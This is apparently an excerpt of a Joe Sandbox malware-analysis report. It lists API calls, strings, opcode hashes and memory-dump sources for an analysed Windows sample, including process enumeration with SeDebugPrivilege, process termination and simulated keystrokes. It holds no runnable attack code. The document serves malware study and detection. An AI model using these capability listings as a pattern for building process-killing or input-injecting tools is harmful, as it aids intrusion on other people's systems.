                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 337547030-0
                                                                                                                                                                                                                                          • Opcode ID: b335c73b511d5fe5150c094bc5a9ebabb9059f66bfc45b64ec648ced667af780
                                                                                                                                                                                                                                          • Instruction ID: 1a3ef0b493138a7a73923b4f7c38daaee32a02b6578263408fb810cb93205fa0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b335c73b511d5fe5150c094bc5a9ebabb9059f66bfc45b64ec648ced667af780
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA318D71602641EFDB619FB5DD44A76BBF9FF18300B04442DF99A82A20D7B1E8549BE0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00133A57
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: GetCurrentThreadId.KERNEL32 ref: 00133A5E
                                                                                                                                                                                                                                            • Part of subcall function 00133A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001325B3), ref: 00133A65
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 001325BD
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 001325DB
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 001325DF
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 001325E9
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00132601
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00132605
                                                                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0013260F
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00132623
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00132627
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                                                                                                          • Opcode ID: 6aba4176c8577c6789c209e377ab1d01f9f553b7b8929fcc1fc9517543fc2d7a
                                                                                                                                                                                                                                          • Instruction ID: c03d1e8e899bae77c7b63ddd42778ff224f6eb882f92199e47344d172b6ffe9c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6aba4176c8577c6789c209e377ab1d01f9f553b7b8929fcc1fc9517543fc2d7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50018831790614BBFB107769DC8AFA93F59DF5EB51F100011F354AF1D1C9F164848AA9
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00131449,?,?,00000000), ref: 0013180C
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00131449,?,?,00000000), ref: 00131813
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00131449,?,?,00000000), ref: 00131828
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00131449,?,?,00000000), ref: 00131830
                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00131449,?,?,00000000), ref: 00131833
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00131449,?,?,00000000), ref: 00131843
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00131449,00000000,?,00131449,?,?,00000000), ref: 0013184B
                                                                                                                                                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00131449,?,?,00000000), ref: 0013184E
                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00131874,00000000,00000000,00000000), ref: 00131868
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1957940570-0
                                                                                                                                                                                                                                          • Opcode ID: 291d6dde5103f7571d19a76cadfad25066bdb6007f169e01912ffd76c5c151ea
                                                                                                                                                                                                                                          • Instruction ID: d5d7e1b10a902494b7c3b46787e592d927b4da619c2a5cf844c1b7f0203f5690
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 291d6dde5103f7571d19a76cadfad25066bdb6007f169e01912ffd76c5c151ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0601BBB5240348FFE710ABA5DC4DF6B3BACEB8AB11F004411FA45DB6A1CAB19840CB70
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0013D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0013D501
  • Part of subcall function 0013D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0013D50F
  • Part of subcall function 0013D4DC: CloseHandle.KERNEL32(00000000), ref: 0013D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0015A16D
• GetLastError.KERNEL32 ref: 0015A180
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0015A1B3
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0015A268
• GetLastError.KERNEL32(00000000), ref: 0015A273
• CloseHandle.KERNEL32(00000000), ref: 0015A2C4
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: a00f668fe0df9402063842f10b4eb6eb38fa7485c1347195fc2f494e2b3d9565
• Instruction ID: 70d9395d81cc1f2f3363b66c6f03f7ecc77b3625bf26d7057b8b6294721b8087
• Opcode Fuzzy Hash: a00f668fe0df9402063842f10b4eb6eb38fa7485c1347195fc2f494e2b3d9565
• Instruction Fuzzy Hash: CD61AD30204242EFD710DF18C895F65BBA1AF44318F54859CE86A8FBA3C772EC49CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00163925
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0016393A
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00163954
• _wcslen.LIBCMT ref: 00163999
• SendMessageW.USER32(?,00001057,00000000,?), ref: 001639C6
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 001639F4
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• API String ID: 2147712094-78025650
• Opcode ID: f3aa56bae18341e93ea017c356cef9a18f8aa4e0b97cbcbaf1d83ccff895a146
• Instruction ID: 346d5a956977c19315918f73c542d5921931c0d54934dfed39e78344afbb988d
• Opcode Fuzzy Hash: f3aa56bae18341e93ea017c356cef9a18f8aa4e0b97cbcbaf1d83ccff895a146
• Instruction Fuzzy Hash: 9741A571A00319ABEF219F64CC49FEA7BA9FF08354F100526F968E7281D7B19D90CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0013BCFD
• IsMenu.USER32(00000000), ref: 0013BD1D
• CreatePopupMenu.USER32 ref: 0013BD53
• GetMenuItemCount.USER32(01095478), ref: 0013BDA4
• InsertMenuItemW.USER32(01095478,?,00000001,00000030), ref: 0013BDCC
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: 9fec33cbcc1d5d568aba5c3185324b8f35468205284c0c76fafe607ea6f552b5
• Instruction ID: a7a3495115851a71122f428c4d7240b02588e24d699253c9c118f6c0b2b9e65e
• Opcode Fuzzy Hash: 9fec33cbcc1d5d568aba5c3185324b8f35468205284c0c76fafe607ea6f552b5
• Instruction Fuzzy Hash: 1B51C070A082099BDF20DFE8D8C4BAEBBF4BF55318F144229E645E7291F7709945CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadIconW.USER32(00000000,00007F03), ref: 0013C913
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: d4779bc0f36f037564cf41ef7df4a8ddbe485bf7f46121139ada1b2cc458fc24
• Instruction ID: aa95ab1e4fe2b1b2990519d9bbcb83440b8c04fff142435676d893008e5085c0
• Opcode Fuzzy Hash: d4779bc0f36f037564cf41ef7df4a8ddbe485bf7f46121139ada1b2cc458fc24
• Instruction Fuzzy Hash: 0B11EB3268930ABAEB099B549C83DEB779CDF15358F11006EF900B6182D7A06F4063E5
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 642191829-3771769585
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
• GetSystemMetrics.USER32(0000000F), ref: 00169FC7
• GetSystemMetrics.USER32(0000000F), ref: 00169FE7
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0016A224
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0016A242
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0016A263
• ShowWindow.USER32(00000003,00000000), ref: 0016A282
• InvalidateRect.USER32(?,00000000,00000001), ref: 0016A2A7
• DefDlgProcW.USER32(?,00000005,?,?), ref: 0016A2CA
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
Uniqueness Score: -1.00%

Similarity
• API ID: _wcslen$LocalTime
• String ID:
• API String ID: 952045576-0
Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0012682C,00000004,00000000,00000000), ref: 000EF953
• ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0012682C,00000004,00000000,00000000), ref: 0012F3D1
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0012682C,00000004,00000000,00000000), ref: 0012F454
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
Uniqueness Score: -1.00%

APIs
• DeleteObject.GDI32(00000000), ref: 00162D1B
• GetDC.USER32(00000000), ref: 00162D23
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00162D2E
• ReleaseDC.USER32(00000000,00000000), ref: 00162D3A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00162D76
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00162D87
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00165A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00162DC2
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00162DE1
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                                                                                          • Opcode ID: 77d788c0cec844aeb51873a56b50cc875812dd3453fb01170bcaab5de0279344
                                                                                                                                                                                                                                          • Instruction ID: fa39a05ea8bc9f966681ccf32ca3803d2bf4033f9de9e12e232fa83d47e497d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77d788c0cec844aeb51873a56b50cc875812dd3453fb01170bcaab5de0279344
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD317A76201614BFEB218F50CC8AFFB3BADEF09715F044055FE489A291C6B59C90CBA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                                                                                          • Opcode ID: e37b9c073c48733e78b5624f01b4e4ed4fe9ebe7068bb4de6fc3173fedd3d185
                                                                                                                                                                                                                                          • Instruction ID: cc6370cb724b2edd9210de8b009c6f36e20137531a68e046c477142a25232488
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e37b9c073c48733e78b5624f01b4e4ed4fe9ebe7068bb4de6fc3173fedd3d185
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8321A7F1644A09B7D71855209D83FFA335FAF20B94F850024FE059A982F760EE21D1E5
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                          • API String ID: 0-572801152
                                                                                                                                                                                                                                          • Opcode ID: 5d7fb40513662fa5a9a79d10ee5eb5784a3385cf4769a86d80f2c04c319d0f7d
                                                                                                                                                                                                                                          • Instruction ID: 24dc3d46838be325203bd8d7e706a5f16c6cb9a07bb009a372ee9a46024ff2a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d7fb40513662fa5a9a79d10ee5eb5784a3385cf4769a86d80f2c04c319d0f7d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD1C271A0060ADFDF14CF98C891BAEB7B6BF48344F148069E925AF281D770DD49CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001117FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001115CE
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00111651
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001117FB,?,001117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001116E4
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001116FB
                                                                                                                                                                                                                                            • Part of subcall function 00103820: RtlAllocateHeap.NTDLL(00000000,?,001A1444,?,000EFDF5,?,?,000DA976,00000010,001A1440,000D13FC,?,000D13C6,?,000D1129), ref: 00103852
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00111777
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 001117A2
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 001117AE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2829977744-0
                                                                                                                                                                                                                                          • Opcode ID: 4099b1042dfe6fbd04bc32f363c305c3553675736635c4b94b0f0815fe0ef3fb
                                                                                                                                                                                                                                          • Instruction ID: fea4e78e8df42f3a60ef53c6afc1802fa2f212d26abe481d5adee665e7ce5e1b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4099b1042dfe6fbd04bc32f363c305c3553675736635c4b94b0f0815fe0ef3fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB91A672E00215BEDB288E64DC41AEEFBB6AF49310F194679EA01E7281D775DCC0CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                          • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                          • Opcode ID: feaa147b1019e8ededee4bb22c1e57074e4e3bbe8a4ea5b681143c581e71da26
                                                                                                                                                                                                                                          • Instruction ID: 15b9d982f126fcd1e57dde76bf8e3372df4a613312212c9ebb8faf6ede34a5dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: feaa147b1019e8ededee4bb22c1e57074e4e3bbe8a4ea5b681143c581e71da26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3591A171A00215EBDF24CFA5C844FAE7BB8EF45719F108559F925AF280D7709989CFA0
                                                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
• SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0014125C
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00141284
• SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001412A8
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001412D8
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0014135F
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001413C4
• SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00141430
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ArraySafe$Data$Access$UnaccessVartype
• String ID:
• API String ID: 2550207440-0
Uniqueness
Uniqueness Score: -1.00%

Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(?), ref: 0015396B
• CharUpperBuffW.USER32(?,?), ref: 00153A7A
• _wcslen.LIBCMT ref: 00153A8A
• VariantClear.OLEAUT32(?), ref: 00153C1F
